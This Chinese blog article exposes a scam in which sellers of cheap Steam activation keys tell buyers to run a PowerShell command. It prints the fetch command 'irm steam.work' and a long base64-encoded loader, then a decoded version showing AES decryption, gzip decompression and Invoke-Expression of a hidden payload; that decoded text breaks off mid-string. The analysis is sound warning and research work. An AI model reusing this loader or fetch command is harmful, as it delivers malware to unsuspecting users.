AI辅助揭秘某宝steam低价游戏激活码投毒套路!

AI辅助揭秘某宝steam低价游戏激活码投毒套路!

网络安全透视镜  2023-11-13 07:00 发表于中国香港
 

以下文章来源于星云安全 ,作者十二

 

    早上闲着无聊刷小破站的时候看到一个up主的视频,不看不知道一看吓一跳啊,黑心商家真的是可恶。

图片图片

商家是利用低价的激活吸引人购买,购买激活码后,打开官方兑换渠道是无法进行兑换的,商家会让你执行一段代码,执行代码后才能进行兑换!

图片

图片

看到要执行powershell那就要注意了,首先我们先看看那串代码是什么意思,我们来问问ChatGPT。

图片

那么我们执行一下前面的代码,不执行后面的代码看看返回什么东西。

irm steam.work

图片

可以看获取到一串powershell执行代码,解密它base64部分。

JAByAGUAZwB3AHEAYgBlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAiAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBNAGEAbgBhAGcAZQBkACIADQAKACQAcgBoAGYAeABrAGUAegB1ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAHgAVgBmAEkAaABGAE8AeQA4ADAAbgB0AEcAUABoAGgATgBtAEkAaQBhADUAQgBVAHEAZgBBAFYAbgBlAEIARABaAGgASwB6ADMAZgBSAFYAYgB4AGgANABpAHEASwAyADQAYwBUAFQAYwBLAE8AVgAvADIATABpAFQAMQA5AEoATwBaAEwATwBuAGQAcABqAGEAYwBuAFkAOQB2ACsATwBGADAAUQBaAGoAQQBTAE0AcgBjADEAeABkAGcAdABrAGoAcQBBAHAARgBTAFoAYQBGADIAVQBHAFQAaAAxAGIAVQBFAFUAcQBFAEkAYwBSAEQAdQBNAEoAaQBoAGkAYwBJAG4AbgBJAFcAVQBpAEYAKwBjAEYANQBsAEcANwBoADEAMAB6ADEAbgBhAHgAUABoAGYAcgA1AEkAcQB6AEYAQQAxAGgAYwBvAEoANgBTAFEAMwBVAFIAbgBVADkAQwB4AHkASAAwAEEAcwB6AFcAMABJAFoAZgA4AGsARgBLAEUAQwBMAFEAbgBMAGkAdQB5ADkAcQBKAEMAZwByAFIAaABRAE4AWQBpAEEAdgB5AGQAZgB0AHkAUwB5AHIAVQB5ADIAVQB0ADAAYQBZAC8ATQAwAEwAegB0AHYASwBjAHcAWQBsAFcAbQBpAGQAOABTAGkAbABpADUAVwBLAEQAbgB6AGwAMgBYAGUANABVAGsAMABQAHIAagB3AGsAKwBEAFoAeQBIAGYAOAB5ADYAVgBPAHkAMAA1AHkANgBRAGoAawBiAFEASABEAEUAdgB0ADEATQB3AGgAaQA5AHUAcgBlAEsAUwBYAEYAZgB6AGsAbQBhAHMAUABaAHAAeABkAFIAYQBNAGcAcwBoAEEAMABwAFMAagB5AHEAbgBSAHkAcwBpAFgAVQBSAHMAOABRAFgAMwBIAHYAUwBtAHIAWgBwADkAdABXAFoAMwAwAEgAZwB5AHkAbABkAFMAcgBLAEEARABlAFcASwBXADYASgBGAFUAVABJAEkAQwBLAFAAegB5AEEAWgBOADgAQQB6AGoAawBNAG4ASABQAHkAZQB4ADQAMABNADMAcwAwAGcARAAvAGMALwB3AGUAeQB6AHgAbAB6AE8ATgBCAGUAYQA4AFIAWgBmADkARQA2ADAAOQBmAEUAQgBZAE8AQgBtADIAagArAHIAdwBKAGkAVgBTAFkASgBzAEQANAAvAGMANgBtAFAAMABRAFYAYgA5AFcAbgBOAEYAbAAwAHMAYQBUADMAUgBuAHgATABvACsAKwBSAHMAQwBBAE4ATgByAGcAOQBJAGcAQwAwAFYAMABaADIAQwBmAEYAbQBqAGQATAB5AFgANQBpAG8AZwBQAG8AaABKAHkAZgBBAGwAOAB6AEEAZgB2AFYAYgA0AFkASABwAHUANQB6AFoAcgBiACsAYgBLAHkAUABUAFEAMQB5AHQAZQBDAFcAQgBPAHYAOQBQAEIAUgBVAGMATwAxAHQAcQAzAEoAZgB2AGcAcAArAEUAdgBiAHMAMgBMAGoAWQBvAG4ANwBCAFcAaQB6AGQAcABHAEIAbQBsAGUASABhAFkAaQBHAFYARQAwADUAVABPAC8ALwBqADQANgBsAGkAZgBSAHgARQBXAEgAdQBrAGQAbgBRAHIATQBBAFgAcQBiAFcAbQB4AFAAbwAxAGkAUwA1AFMAUQAwAEkAVQB2ADIAOABhAEQAYQBHAHAATQBEAGwAdwBSAG4ASQBWAGoAaQBkAEwARwB1AFQAaQBFACsAVABHAEoAeQBlAGIAZwBLAEEASABzADkARgBpAEgAVgB3AFYALwBhAGMAUQBaAFQAMwBuACsASgBDAGUAUgAvAFAARgBsAE0ATwBFAEkASQB1ADcAZQBZAFgAcABtAEgAawBUAEgAbwBRAEwANgBQAHkANgBjAFoAbgA4AHcAaQB2AEUAUgByADcAYgB6AGUAeQB4AG8AKwBaAFgARgBoADQAOQBWAGsAbQB1AGoASABkAFYAKwBFAEQAOQBBAFoAbgBLAGsAeQBNAEcAVAA0ADMAegBQADEAQgBpADEAYwB3ADUALwBCAHgAeABEAGsAMgBmAC8AYwAvACsASgBnADIANgBFAHcAZABiAGEAZAB0AGQASAArAFoAOQAxAEgAaQA2AEcAcQBuAHkAMwAzAGcATgB4AHgAdQBuAEsAMQBrAGUAeQA2AEUATABrAGMAVwBrAEUAUABzAE4ASwBUAFgAQQA3AE4ANgBOAHAAUAB0ADMAKwArAC8ASgBiADYAYgBZAGEAVwBGADUAVQBLAFYAZQBSAHYAUABEAC8ASAA4AG4AcgBPAEoAYwA5ADgAdQBoAEEAQgBiADcAUAArAEsANwBlAEQAZwBJAHgAawBEAHoAZQBnAE8AbAAwAG8AaQBBAFQAZAAxAFkAOABsAE0AZwBJAGIAeQBKAEEAcQBDAGcAZQBzAGQASQBiAGYAcwB1AHgAYwBJAHoAdABGAGYARgBqAE4ANwBYAGUAcwBvAGQAYgBDAEcAUwBmAE4ARABBAFkAZABKAGIAegBEAFQAdQB3AHUAbQBTAGEAdgBkAGMAZABHAFQAWABtAHoARwB3AHcAQQA5AGsATQBTAEEAZABZAFYAYQBsAFUARABZADkAaQBaAGgAWQBXAG4AegBQAG8AMABVAFMAVQAyAEcAawBMAGYARAB4AFUANABnAG0AZwBkADAATgBZAHQAcQBsAFUAYQBKAGMASQBWAFoARgBWAGQASgBQAEYATgBMADcAUwBnAFcAQQBKAE0ANQB1AHcAZwBvAEgAVgAwAHIAOQBMAHQANwBpAFgAMQBHAC8ASQAxAHAAZwAxAFUAZABCAEUAawAvAGkANQAyADYAaQBWAHAAbAA2AGwAbABtAEkASwBDADEAagBPADgASgBGAE8AegA3AG0ASAA3AHoAVgBWAFQAWQBwAGgAMgBrAHkANgBCAEUAUABnAEsAWQBXAHMAdQBaADIATwBmAC8AdwBSAFEASABrAHkASAB2ADQANQBMAGkAaABXAGIAWABoAE4AWQBtAEYAbwBpAEcAWQArAGoARQBGAEMAeQBLADMATABDAFEAaQBuAFIAQQBWAHIASQBwAGkAVwAyAGUAZwBkAGoAZABjAEQAdwBQAHcATQB5AFcAUgBrAGMAVAB2AHUAcAB5ADQARABmAGYAYQBKAG0AaABKAEUASgBsAFIAbQBKAFIAVQAzAGYAOQB1AEgAQwBKAHQAUgAwAFMAcQBTAFcANABQAEgATAAxADEAWQBuAFYAZgAzAGQAVgBDAGgASwBXADUAagBYAFgAcwB3AE8AMQA1AHAANABQAGcAMgBMAGEAWgBaAEwARABvAGYANgBxAGMAOABjAEgASgBaAHkANgBBAEEATAB5AHYALwBpAG8AdAB1ADEAVwBTAFYANwBPAFoARQBvAFUAYwA2AGgANgBkAFoARQBHAGYAWQA2AGoAdgA1AGQAMgBLAEsARQAyADIAYwAzAEkAbwBOADcAUwBhADAAYgBIAHkAcQBTAGkAUABiAHoAQQBoAGcAMQBZAGoAUwBnAEIAOQBIAHIAdQBiAFoAYwBRAEYAMgBMADYAaQBzAFQAMABDAEcAUwBIAEoAbgB6AFoAVABMADMAbwBuAFMAMABYAHAATwBEAFoASQBaAGwASgBTADEAVwBFAGQASQBVADMAUwA5AEgAZwBWAE0AMgA5AFoARQBBAEcAOABjAFYAbwAyAGoARABPAHoASgAvAC8AbQAvADUAZABpAEUANgA5AHMAMgBSAGkAKwB3AGgAdgBMAFAASgB2AGwAbgBjAGMAQwBHAHQAMgBLAFcAbwBnAG0AOABIAFIAVABKADkAQgA4AFgASABkAFIAaABOADIAcQBMAFEAMQBEAEUANABsAGwAYgBOAGQANABmADUASgBWAGkAVgBrAEoAYQB6AG8AWgA4AFEAbwB3AEsAawBUAHcAaAA2AGYAdwBQAE0AagBSAEcAOQBkADcAOAB3AGwAYQA2AGYAMwBaADEAbQBqAHIAVwAyADUAZABpAGUAcgA4AC8AbQBXAE4AeQBQAGgAbABsAHQANwBkADkAcgBZAFoAdwBjAHMAcABpAGkAUQBLADYAOABnAEsAOAA0AG4AZwA0AC8AWABwAHIAYgA0AHUAZQBqADIAcgBHADEAUAA0AEwATAA1AEEATABlAFIAeQBVAGUATgBGAC8AKwBVAE4ARgBRAFoAegBUAHIANwAwAE4AMQArAG8AYgB6AGYAegBRAGoAcQBjAHgAdgBIAGEAaQBoADIAUQBZAEsAcQBlAGIAMwBXAE0AbgBTAEkAcQBpAEgAOABZAFIAUAA5AFoAOABrAGEAMwA2AC8AcQBoAFYASgBPADMAZAA4AFMAUwByAHoAdABNAGIAeQBuAFIAcABXAFgATwBmAGQANABrAFoAVQB3AG8AVQBQAGoAZgBtAGQAaQBMAFIASgB1ADEAQQBQADIATABOADcASgBYAEYAaAA2AEgAaQBJAGcARwBzAHQAMgBVAHIAeABpAHcALwBvAFoAagBqAEkAaABIAFUAYQBIAGwAOQBzADUAUAB1ADAAdwBrAFgAUQArAEsAeABiADUAWQBzAGgAWQB5AEgAdABVAG0AZQBUAGEAdABhAG4AbQAwAEwAVABNAEkAcQBQADkAVQBoAHIAZwBDADEAbAB6AGIAMwBRAFoAUABqAHYAeABUAHQATQBBADgAeQA3AEgAMwBaAHcAeQBmAHcAbQBQAGgAaABQAEMAVwAwAE0ALwBMAFQANwBUAGkATgBJAEQAMgA5ADcAegB2AHkAawBMAGkAQwBxAHAAUwBiAE4AcABkAFYAVABTAHgAdABHAE0ARgBOADEANQBKAGIAaQBCAHUASwBRAE4AOABvAGsAegBWAEkAZwBWAHcAWABhAHUATQB4AEIAUwBoAEoAWgBBAEIAQQBnAEQAZABjAE4ASwBwAE8AKwBpAC8AOQBVAEgAaQBjAEgAWQBtAFYAawBqAEgAeQBUAGwAegB1AE8ANwB1AHEAUgB3AEQAVABYADcASQByAGsANgBLAE0AdAA5AFgASAA1AFgAdQBDAEkAcgB2AE0AMwBIAHkAQgBMAGQASgB4ADcAVQBEAHcAQwBPAEkAVQAxADUAQwA3AEcANQBFAGEAawBmAGYAYwA4AGYAaAAyAGoASwBRAFAARQBUAFYAcQA5AHoAawBwADQAZAAzADEAZABrADEAUgAyADMAVABjAGkAeQBJAEQAZwBVAG0ANgBJAGwAdgBpAEoAbwAxADEATgBvAGwAagBQAGoATgBUAEMARwBsAFYAdABNAFMAYgBKADAAQQBnAEsAdwBqADcAeAB2AG8ARwBjAEoAVQBuAGMAVwBGAHIAWAA4AGoAYgA3ADgAbwBzAHcAbgB0AEMAVAA5AGEAUgBSAGkATAAyAHYAUABYADAAegBzADQAVABtAFUAYgB2ADQATABEAGwAcQBiAE4AQgBVAEQAMQA2AEUAaAA0AEoAagBrAEEAcQB3AFEASABTADMAcQBpAE8ANQBIAFoATgA2AFkANgB3AE8AKwA0AFQAawBDAEMAUABYADkAegBTADQATwBjAHgAVABHAHYAbQBnADYATgBFAFUASQBMAEsARgBQAEUAZABuAEwARAAyADYAUAA1AHEAdABQAHEASQBWAGcAZABkADQATwBlADAAQwBoAC8AUgBPADMANwBaAGoAYwBmAEsASgBKADcAagAxAHgASQBLAHgAWQB3ADEASwBJAEYAWQB1ADMAaAB5AHEAMQBBAFMAeQBOAEQAQwB1AGMAcQBmAEQAcwBQAHAAWQBLAGEAaQBTAHQAbABQAFUATgBWAHkAVQBNADMAQwBoAEcAOAAyAHUAVQA0AGsAZgBtADUATwA2AFEAVgBZAEQAMgA4AGIAeQBrADMAVQAvAG4AUgBpAHMASABEADQAeQA3AHkAMABDADIALwBhAHEAYwAzACsAWAB0AFEAbwBSAE4AMQBGAE4AMgBPAE0AbgB1AHQAdwBkAEkANABNAFgAQQBkAFUAegB2AHEAMgBGAHMAOABsAEQAbQAxAFoAUABaADEAQwB4AHkAVgBGAHoAQQAxAHUASQBEAGYATwBHAEEAMQBlAHEAYgBUAHkAZQBSAHUAbQBYAGsARABzAHUAYwBIAGEAUQBEAGUARQBRAGIATQB0ADkAZQBtAEUAUABrAFIAdgBSAHoAYgBpAEEAagBFAEwAagBGAEkAWQBvAFQANgBQAFgATwBDAG8AdAAwAFYAQQBjADgAZABiAE8AdwB5ADIAcAB1ADQAegB1AFMAdABDADYAaABkADcAZQA4AHIAcgBFAEUAZQBhAHcAeABRAHAAcwBkAC8AeABrADEAaABzAGYAVQBvADYAZwBXAGwARwAvAHQAdAA1AFgAZgA3AHIASAA2AGMAcgBpAGsATABmAGcAMgAxAGgAUAByAG0AaQBVAEMAVABiAG4AegBmAHgAcABZADMAaQBIAFcAbwBjAFYAQwBLADAASwBqAEgATgA5AHMAbABBAFEAVQBWAGkAVQBiADIASwBkAHMAcQAyAG4ATgArAFoAdwBIAHkAegAxAGEAagBkAHAANQAyADcAdABwAGgAbQBtADkAbQBqAG4ARQA0AHMASQBRADQAdABUAEcASQAxAE4AMgBaAHcAeQBEAGgAOQBEAFcAOQBJAEcAawBtAEkASABLAFUAcQBqAEkAUABSAEEAVQBGAGwANwA4AFgAagBZAHgAeAB3AGkAKwBWAEMAOABNADcAegBrAGkAUgA2AEkAbwBjAEEARQAyAFoAMQBVAGMARwAxAGMAYwBmAHgAUgA3AHYAZABhAGgASwBRAFQANwBUAGQAdwA4AEYAQQA5AHAAZgBTAHYARwBKAHYAWgBEAEEAeABqAHUAdgAyAHAAVgBhAEgAUwBnADUAMwBDAFUAKwBBADMAcQBIAHQAUQAwAGwAVwBLAEwAVAA1AGoAMgA5AFQAaQBqADIAegBVAHIAYwB6AHMAVQBsAE8AcgAzAEUAcgBHAC8AeABpACsAbwBoADgALwA2ADkAeAB3AEUAMgBaAHAAKwByAEgATQA3ADAAWABRAE0ATQA2AHkASgA2AFYANgBWAEsAUQBmADIASAB6AEkASgArAGkAUQA3AGcASABWAHkAWgBCADQAcAB1AEwAMQAyAGkARwArAHAAbgBQADIANwBHAFcATgBmAFUAUwBrADIANgBWAHIANQBHAHYAMABPAFUATwBlAHoAMABFAC8AdwBaAEoARwBHADYATgBBAHgAbgBuAE0AeABrAEsAKwBwAGMAMAB2AFgATgA0AEwAaABsADcANgBZAHYAagBSAEMAKwBWAFIAYwBHAHkAeABUAHAASQA3AE4AYgBpAFEAYwBLAGoAZQBsAGkAYwA3AE4AZQBFAGkAeQBvAFoAOABlADcAawA0AFQAOABjAFQAcwBnAEwAaABuADYAMgB5AFcASwBPAHMAcwBVAHIAYwBaAHMANwBLAHMAegAxAE8AYQBXADEALwB4AEkAOABwAG0AWgBoAGkAYwBoADAAUgBFAEcAUwBNAFMARwBrAG8ARwAyADcASwBlADgAcwBQAHIAegBDAHoAbgBTAG8ARgBOAC8AMQBpAG4AdwA2AEMAWQA3AFoAcABjAEUAVwBBADkASgA0AFAAVgAvAFkAUgB6AEgATgB3AHoAYQA3AG0AQQB1AFMAdgBQAEIAbwBBAEwAWgAwAFAAeABYAEEATABGAFAAZAAwAFYASwA2AHcAVgBEAHMASgBkADgAUwByAHEAZAB0AEsAZwBqADkAOABMAHAAcABJADEAaQAyAFAARAB2AFQAeQBSAFQANwBqAFAAOABLAHkAMQBMAGIAcQBoAFgAZQBrAG4ATABHAG0AZQA4AGMAYgBSAGQANAAzAFQANQBjAEwAagBSAGkAVQBuADYAZQBaAFQARwBBAGIAWQBXAFkARABWAFAAVgB6AHMAbABlAE4ANgB4AFoATAB1AEsAVQBmAEsAVABNAEUANgBWAG8AVAA2ADUANAAyAFgAawBBAE4AQQAwAFYAaQB2AEQAYwBPAGEAbQA2ADgANABMADIAVQBYADUATQBPAGYARgBhAHkAcgBwAEcAZQBiAGgAVQBDAGcAdQBJAEUASwBaAGUAYwBlADYAQwAwAEMARwBVAGwAdwA2ADEAaAA0AHYAUgA2AG4ARQBaADkAWABmAGMANQA4ADMAWgBiAHoATgBIAE0AZAA4ACsAcAAvAHkASABhAFkAVwBjAEsAZQBvAEIAOAA0AEQAdgB3AFYAcwAxAEYAaABPACsAWQBiAHkASwB0AHAAdABxAHQAawB6AFcAaAAxAEwAbQByAGMAVgBBAE8AcQBrAC8AagBJAGwAdQBIADkASwBrAFIAVgBkAEUAagBBAEgAbQBoADYAVwBjAFEAbwBjADAANQArAFMANwBRADIAZQBsAE8AbQBRAG4AaABEAEMAMgBMAG0AQQBmADUAdABYAG8ANgBqAFUAVwAwAHEAUAB4AEQANQBCADUAMwAxAHMAKwBiADAAZwBHADEAYQBrADQAYQBPAHkAZQArAG0AdgBsAFcATwBQAFQAeABjAHAAZAB0AGQARwB1ADkAeAB3AFcAMgBJADcAZQArAGIARQByAFcAZAAvAFQAOAA3AHoANwBvAGIASQAzAG8ANQAvAE0AbwBCAG0AMgBaAFkAUABwAC8ARABiADMAbgBEAGcAYQBsAFQAVwA0AHAAWABwAGMAVQB6ADMAZABTADUAVABRAHAAOQBiAGoAegBHAEcAeQBKAFEAdgBhAEcAOQA4AHMAMABqAEEAZwByAEYATwB0AEkAQQBnAG0ARwBCAFIAegAvAFIAbQB2AHoATwBnAE0ANAArAHIAdQBRAE4AWAB5AEEAKwBDADQASQBqAHcAbwBlADQAdABTAEIAcABSAHYAawBWAEMAZAByADQAUQBXADgAbgBFAE8AUABHAGgAbABPAEkAbAA4AFUAWgB2ADMAOABVAGkAcwBxAFEAegBVAGUAQwArAHgAVgBPAGEAYQA0AGYAUABOAGsAVABEAG8ATQAvAFgAZgBTAGwAaABjAEoAcwA4AHMANABMAFIAQQAvADYAVwBsAEUAZwBRADUAMwBsAEIAWQA3AE0AeQBjAHoAdQAwADcAQgBwADUANQBMAHEAagB5ADcAZABHAGcARAA2AGYAUgB4AE4AdgBkADcALwBMAFgAKwBBAHYAQQB1AFQANgAyACsASwBlADMAMwB5AFMAZABJAEoAcQBRAEQATQBvAEsAMQBBAGQAUABXAFIATQBYAEwAdAA2AEkAZAAxAG0ATgBnAFIAVABmAE8AWQBBADkARgBaAFkAawAvAFMATQArAGMASABFAHIAVQBPAEoAZABzAGoAOAA3AEkAQQBnAC8AcQBpAG8AZAB4AGwAMABIAEsATABWADEARQBHAGYAQgBDAEoAaABWAG8ARwAyAFAANgA1AGcARgBWAEcAVAAxAFEARQBqAHYAeAA1AHcAOABmAFUASgBvADkAUQBIAEsANABQAGoAMABIADYAWABLAGkANQBDAGIASQBWAGkATgAxADYASAAwAFAAWQA4AGQAQwA3AHEANQBVADkAWABKAFoAUgB0AGgAZgBNAFAAaABjAHAAbwBGAHIAcwBVADcASwBqAFIAbQBDAHoAdwBIAHUANwBvAHAAQgA1AGkAMgBEADQANwAzAEwAYwBwAEkARQA3AGQASgBqAFAASwBBAFUAZgBsAFUAVwBTAHcANABOAC8AUQBFAGoAMABEAHIAYwBYAE4AVQBqAHgAMABrADUAMgArAEcASQBrAEYAWAAzAHoAcAB2AHYAaABwAGEAdQBKADAAOAByAGsATgBlADcAcQBNAGwAZQBYAGEAcQBJAFoAaAA0AGMAWgBiAGkAcAAzAFoAbAArAFYAcwBiAFYAdQBsAHMASgA4AEUAcgB0AHcAUABTAGEAZgBoAHcARgAvAHEAVQBJAFkAZABaAC8ANQBRAHUAKwBFAFYAegBhADcAbQBCAGUAMQBvAE8AZgBLAFUAdgAxAHoAQgBlAE4AZwB5AEgALwBNAFIAMQBnADUAegBNAGYAaQBYAGkARgA1ADQAagBNAHMAcgBGAEgARgByAGkASAA5AFMAagBDAEkAUgBRAG4AcQBRAGsAYwBYAEsASQA2AFQAdQBUAGgAUQAwAFMAZQAzADcAQQB6AEgAZgArADAAPQAiACkADQAKACQAYQB0AHYAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBoAGsAZABBADAAVgBoAEQAZwAvAFkAQwA0AEcAZQBRADEAMgByAEgAYgA0AGEAaABpAC8ANgBLAG4ATABPADAAWQBBADEARwBiAEoAMQAzAGwAQgBVAD0AIgApAA0ACgAkAHIAZQBnAHcAcQBiAGUALgBJAFYAIAA9ACAAJAByAGgAZgB4AGsAZQB6AHUAWwAwAC4ALgAxADUAXQANAAoAJAByAGUAZwB3AHEAYgBlAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAUABLAEMAUwA3AA0ACgAkAHIAZQBnAHcAcQBiAGUALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoARQBDAEIADQAKACQAcgBlAGcAdwBxAGIAZQAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMQAyADgACgAkAHIAZQBnAHcAcQBiAGUALgBLAGUAeQAgAD0AIAAkAGEAdAB2AHQADQAKACQAcgBlAGcAdwBxAGIAZQAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4AA0ACgAkAGoAbwBpAHAAaABwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAAkAHIAZQBnAHcAcQBiAGUALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJAByAGgAZgB4AGsAZQB6AHUALAAxADYALAAkAHIAaABmAHgAawBlAHoAdQAuAEwAZQBuAGcAdABoAC0AMQA2ACkAKQANAAoAJABnAGkAYQBhAGkAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQANAAoAJABjAG4AdQBzAGsAZwBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAagBvAGkAcABoAHAALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkADQAKACQAYwBuAHUAcwBrAGcAYQBtAC4AQwBvAHAAeQBUAG8AKAAkAGcAaQBhAGEAaQB0ACkADQAKACQAdgBuAGQAagBzAHAAZQBuAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABnAGkAYQBhAGkAdAAuAFQAbwBBAHIAcgBhAHkAKAApACkADQAKACQAYwBuAHUAcwBrAGcAYQBtAC4AQwBsAG8AcwBlACgAKQANAAoAJABqAG8AaQBwAGgAcAAuAEMAbABvAHMAZQAoACkADQAKACQAcgBlAGcAdwBxAGIAZQAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AKAAkAHYAbgBkAGoAcwBwAGUAbgBkACkADQAKAA==

解密后:

$regwqbe = New-Object "System.Security.Cryptography.AesManaged"$rhfxkezu = [System.Convert]::FromBase64String("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